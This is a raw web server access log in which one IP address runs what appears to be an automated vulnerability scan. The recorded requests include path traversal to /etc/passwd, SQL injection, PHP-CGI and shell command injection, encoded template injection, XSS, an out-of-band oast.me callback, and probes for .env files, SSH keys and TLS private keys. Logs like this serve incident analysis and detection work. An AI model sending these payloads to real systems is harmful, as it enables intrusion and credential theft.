195.164.49.69 - - [18/Nov/2024:23:47:47 +0000] GET /backend/elfinder/elfinder-cke.html HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:23:47:49 +0000] GET /elfinder/elfinder-cke.html HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:47:51 +0000] GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1 404 1139
195.164.49.69 - - [18/Nov/2024:23:47:52 +0000] GET /uploads/assets/backend/elfinder/elfinder.html HTTP/1.1 404 1135
195.164.49.69 - - [18/Nov/2024:23:47:54 +0000] GET /uploads/elfinder/elfinder-cke.html HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:23:48:01 +0000] GET /?echo+gEYMswnnYH HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:48:03 +0000] GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:48:07 +0000] POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:48:09 +0000] POST /jolokia/read/getDiagnosticOptions HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:23:48:11 +0000] POST /api/external/7.0/system.System.get_infos HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:23:48:17 +0000] POST /admin/ajax.php?action=login HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:48:20 +0000] POST /casa/nodes/thumbprints HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:48:21 +0000] GET /index.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:48:25 +0000] GET /service/0/test.oast.me HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:48:27 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:48:35 +0000] POST /magmi/web/magmi_saveprofile.php HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:23:48:36 +0000] POST /module/ HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:48:43 +0000] POST /module/ HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:48:43 +0000] POST /module/ HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:48:46 +0000] POST /api/snapshots HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:48:51 +0000] GET /login/ HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:48:56 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:48:56 +0000] POST /adminer.php HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:48:56 +0000] POST /adminer/adminer.php HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:49:00 +0000] POST /wp-json/buddypress/v1/signup HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:23:49:03 +0000] POST /adminer/index.php HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:49:03 +0000] POST /_adminer/index.php HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:49:03 +0000] POST /_adminer.php HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:49:06 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:49:07 +0000] GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:49:13 +0000] GET /bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:23:49:17 +0000] GET /admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:49:20 +0000] GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:23:49:22 +0000] GET /chaosblade?cmd=$(id) HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:49:23 +0000] GET /user/login/ HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:49:29 +0000] GET /cpanel.php HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:49:41 +0000] GET /admin.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:49:41 +0000] GET /adminer.php HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:49:41 +0000] GET /xmlrpc.php HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:49:41 +0000] GET /.env HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:23:49:41 +0000] GET /admin.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:49:42 +0000] GET /php-info.php HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:49:42 +0000] GET /php_info.php HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:49:42 +0000] GET /phpinfo.php HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:49:42 +0000] GET /info.php HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:49:42 +0000] GET /adminer.php HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:49:42 +0000] GET /xmlrpc.php HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:49:42 +0000] GET /bin/cron.php HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:49:42 +0000] GET /cache/index.tpl.php HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:49:54 +0000] POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:23:49:55 +0000] POST /magmi/web/magmi_run.php HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:49:57 +0000] GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:23:49:59 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:50:01 +0000] GET /.webui/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:50:03 +0000] POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1 404 1142
195.164.49.69 - - [18/Nov/2024:23:50:05 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:50:10 +0000] POST /bonita/loginservice?redirect=true&redirectUrl=%2Fbonita%2Fapps%2FappDirectoryBonita HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:50:14 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:23:50:16 +0000] GET /WebInterface/ HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:50:18 +0000] POST /api/v1/users/signin HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:50:20 +0000] GET /api/proxy/tcp HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:50:30 +0000] GET /sites/web_vhost_domain_list.php HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:23:50:31 +0000] POST /login/index.php HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:50:34 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:23:50:36 +0000] POST /login/index.php HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:50:36 +0000] GET /sites/web_vhost_domain_list.php HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:23:50:36 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:23:50:36 +0000] POST /login/index.php HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:50:36 +0000] GET /sites/web_vhost_domain_list.php HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:23:50:36 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:23:50:40 +0000] POST /core/ajax/user.ajax.php HTTP/1.1 404 1105
- - - [18/Nov/2024:23:50:42 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:50:44 +0000] GET /?controller=AuthController&action=login HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:50:45 +0000] POST /WebConfig/lua/auth.lua HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:50:45 +0000] POST /WebConfig/lua/auth.lua HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:50:50 +0000] POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1 404 1122
83.212.98.101 - - [18/Nov/2024:23:50:51 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:23:50:52 +0000] GET /userRpm/MenuRpm.htm HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:50:56 +0000] POST /login.cgi HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:50:57 +0000] GET /html/usr/share/doc/hostname/copyright%3f HTTP/1.1 404 1134
195.164.49.69 - - [18/Nov/2024:23:50:59 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:23:51:01 +0000] GET /magmi/web/info.php HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:51:03 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:23:51:04 +0000] POST /authorize HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:51:06 +0000] POST /authorize HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:51:27 +0000] GET /.env.dev.local HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:23:51:27 +0000] GET /.env HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:23:51:28 +0000] GET /.env.production.local HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:51:28 +0000] GET /.env.development.local HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:51:28 +0000] GET /.env.prod.local HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:23:51:28 +0000] GET /.env.local HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:51:28 +0000] GET /.env.example HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:51:28 +0000] GET /.env.stage HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:51:29 +0000] GET /.env_sample HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:51:29 +0000] GET /.env.live HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:51:29 +0000] GET /.env_1 HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:23:51:29 +0000] GET /.env.old HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:51:30 +0000] GET /config/jwt/private.pem HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:51:31 +0000] GET /id_rsa HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:23:51:33 +0000] GET /host.key HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:51:33 +0000] GET /localhost.key HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:51:33 +0000] GET /.ssh/id_rsa_2048 HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:51:33 +0000] GET /.ssh/id_dsa HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:23:51:33 +0000] GET /.ssh/id_rsa_4096 HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:51:34 +0000] GET /sdc.iopan.pl:443.pem HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:51:34 +0000] GET /id_rsa_1024 HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:51:36 +0000] GET /ssl/localhost.key HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:51:44 +0000] GET /id_rsa_3072 HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:51:44 +0000] GET /id_rsa_2048 HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:51:45 +0000] GET /id_rsa_4096 HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:51:46 +0000] GET /private-key HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:51:54 +0000] GET /key.pem HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:23:51:54 +0000] GET /id_dsa HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:23:51:56 +0000] GET /.ssh/id_rsa_1024 HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:51:56 +0000] GET /ssl/sdc.iopan.pl:443.key HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:51:57 +0000] GET /.ssh/id_rsa_3072 HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:51:57 +0000] GET /sdc.iopan.pl:443.key HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:52:08 +0000] GET /.ssh/id_rsa HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:23:52:13 +0000] GET /www.key HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:23:52:13 +0000] GET /privatekey.key HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:23:52:13 +0000] GET /my.key HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:23:52:14 +0000] GET /server.key HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:52:18 +0000] GET /N0t4xist*~1*/a.aspx HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:52:22 +0000] POST /api/v1/users/signup HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:52:25 +0000] GET /api/.env HTTP/1.1 404 1086
83.212.98.101 - - [18/Nov/2024:23:52:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:23:52:49 +0000] GET /.env.backup HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:52:49 +0000] GET /.env HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:23:52:49 +0000] GET /.env.bak HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:52:49 +0000] GET /.env.dev HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:52:49 +0000] GET /.env.dev.local HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:23:52:49 +0000] GET /.env.development.local HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:52:49 +0000] GET /.env.prod HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:52:49 +0000] GET /.env.prod.local HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:23:52:49 +0000] GET /.env.production HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:23:52:50 +0000] GET /.env.production.local HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:52:50 +0000] GET /.env.local HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:52:50 +0000] GET /.env.example HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:52:50 +0000] GET /.env.stage HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:52:50 +0000] GET /.env.live HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:52:51 +0000] GET /.env.save HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:52:51 +0000] GET /.env.old HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:52:51 +0000] GET /.env.www HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:52:51 +0000] GET /.env_1 HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:23:52:52 +0000] GET /.env_sample HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:52:52 +0000] GET /.env.iopan HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:52:52 +0000] GET /.env.sdc HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:53:27 +0000] GET /%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:23:53:27 +0000] GET /../../../../WEB-INF/web.xml HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:53:28 +0000] GET /../../../WEB-INF/web.xml HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:53:28 +0000] GET /../../WEB-INF/web.xml HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:53:28 +0000] GET /%c0%ae/WEB-INF/web.xml HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:53:28 +0000] GET /../WEB-INF/web.xml;x= HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:53:28 +0000] GET /%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1 404 1137
195.164.49.69 - - [18/Nov/2024:23:53:28 +0000] GET /../../../WEB-INF/web.xml;x= HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:53:28 +0000] GET /../../WEB-INF/web.xml;x= HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:53:28 +0000] GET /.//WEB-INF/web.xml HTTP/1.1 404 1047
195.164.49.69 - - [18/Nov/2024:23:53:29 +0000] GET /WEB-INF/web.xml HTTP/1.1 404 1047
195.164.49.69 - - [18/Nov/2024:23:53:29 +0000] GET /../WEB-INF/web.xml HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:53:30 +0000] GET /%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:23:54:01 +0000] GET /static/..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:01 +0000] GET /etc/passwd HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:23:54:01 +0000] GET /..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:01 +0000] GET /..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:01 +0000] GET /..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:02 +0000] GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:02 +0000] GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:02 +0000] GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:02 +0000] GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:02 +0000] GET /static/..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:02 +0000] GET /./../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:02 +0000] GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:02 +0000] GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:02 +0000] GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:03 +0000] GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:03 +0000] GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:03 +0000] GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:03 +0000] GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1 404 1136
195.164.49.69 - - [18/Nov/2024:23:54:03 +0000] GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:03 +0000] GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1 404 1136
195.164.49.69 - - [18/Nov/2024:23:54:03 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1 404 1224
195.164.49.69 - - [18/Nov/2024:23:54:03 +0000] GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:03 +0000] GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1 404 1165
195.164.49.69 - - [18/Nov/2024:23:54:04 +0000] GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:23:54:04 +0000] GET /..///////..////..//////etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:19 +0000] GET /file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php HTTP/1.1 404 1124
195.164.49.69 - - [18/Nov/2024:23:54:21 +0000] POST /install/install.php?step=4 HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:54:23 +0000] GET /index.php?v=d&p=dashboard HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:54:25 +0000] GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:54:28 +0000] GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:54:31 +0000] GET /csz-cms/plugin/article/search?p=3D1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(6)))qIap)--%20ogLS HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:23:54:33 +0000] GET /videoseyret.php?id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(6)))NyiX) HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:23:54:34 +0000] GET /WAN_wan.htm?.gif HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:54:36 +0000] POST /direct/polling/CommandsPolling.php HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:23:54:38 +0000] GET /_404_%3E%3Cscript%3Ealert(1337)%3C%2Fscript%3E HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:23:54:40 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:54:42 +0000] GET /user/requireLogin HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:54:46 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:54:47 +0000] GET /jwt/private.pem HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:54:47 +0000] GET /var/jwt/private.pem HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:54:49 +0000] GET /private.pem HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:54:50 +0000] GET /ssl.txt HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:23:54:50 +0000] GET /ssl_key.txt HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:54:50 +0000] GET /certificates/sdc.iopan.pl.pfx HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:54:50 +0000] GET /certificates/sdc.iopan.pl.p12 HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:54:50 +0000] GET /ssl/sdc.iopan.pl.pem HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:54:50 +0000] GET /ssl/sdc.iopan.pl_key.txt HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:54:53 +0000] GET /cert/sdc.iopan.pl_key.txt HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:55:00 +0000] GET /cert/iopan.pl_key.txt HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:55:00 +0000] GET /cert/sdc.iopan.pl.txt HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:55:00 +0000] GET /ssl/private/sdc.iopan.pl_key.pem HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:23:55:01 +0000] GET /certs/sdc.iopan.pl_private.key HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:23:55:08 +0000] GET /certs/sdc.iopan.pl.key HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:55:08 +0000] GET /certificates/sdc.iopan.pl_priv.pem HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:23:55:09 +0000] GET /certificates/sdc.iopan.pl_privkey.pem HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:23:55:09 +0000] GET /certs/sdc.iopan.pl.pem HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:55:10 +0000] GET /private/sdc.iopan.pl.key HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:55:10 +0000] GET /keys/sdc.iopan.pl.pem HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:55:25 +0000] GET /*~1*/a.aspx HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:23:55:27 +0000] POST /search HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:23:55:29 +0000] GET /wp-content/plugins/knews/readme.txt HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:23:55:33 +0000] GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [18/Nov/2024:23:55:34 +0000] GET /?aam-media=wp-config.php HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:55:39 +0000] GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1 404 1149
195.164.49.69 - - [18/Nov/2024:23:55:45 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1 404 1139
195.164.49.69 - - [18/Nov/2024:23:55:45 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00 HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:55:45 +0000] GET /index.php?page=etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:55:46 +0000] GET /index.php?page=etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:55:46 +0000] GET /index.php?page=../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:55:46 +0000] GET /index.php?page=....//....//etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:55:46 +0000] GET /../../../../../../../../../etc/passwd HTTP/1.1 400 1160
83.212.98.101 - - [18/Nov/2024:23:55:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:23:55:51 +0000] POST /wp-json/igd/v1/get-users-data HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:23:55:53 +0000] GET /install/includes/configure.php HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:23:55:55 +0000] GET /backup/config.xml HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:55:57 +0000] GET //content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1 404 1184
195.164.49.69 - - [18/Nov/2024:23:55:59 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:56:00 +0000] GET /WAN_wan.htm?.gif HTTP/1.1 404 1085
